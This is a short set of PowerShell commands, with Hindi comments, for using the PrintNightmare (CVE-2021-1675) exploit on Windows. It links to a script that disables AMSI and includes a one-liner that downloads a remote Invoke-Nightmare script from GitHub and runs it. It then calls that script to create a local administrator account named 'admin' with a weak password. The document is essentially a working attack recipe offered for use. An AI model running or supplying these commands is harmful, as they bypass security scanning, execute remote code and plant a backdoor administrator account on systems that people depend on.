
# CVE-2021-1675 PrintNightmare के लिए PowerShell एक्सप्लॉइट जो AMSI को अक्षम करता है और कमजोर Windows सिस्टम पर एक स्थानीय व्यवस्थापक खाता बनाता है।
#amsi अक्षम करें: (पावरशेल में कॉपी करें) https://raw.githubusercontent.com/jj4152/cve-2021-1675/main/disable-amsi.txt
#invoke-script निष्पादित करें iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jj4152/cve-2021-1675/main/Invoke-Nightmare.ps1')
#व्यवस्थापक खाता बनाएं Invoke-Nightmare -DriverName "Xerox" -NewUser "admin" -NewPassword "P@ssw0rd"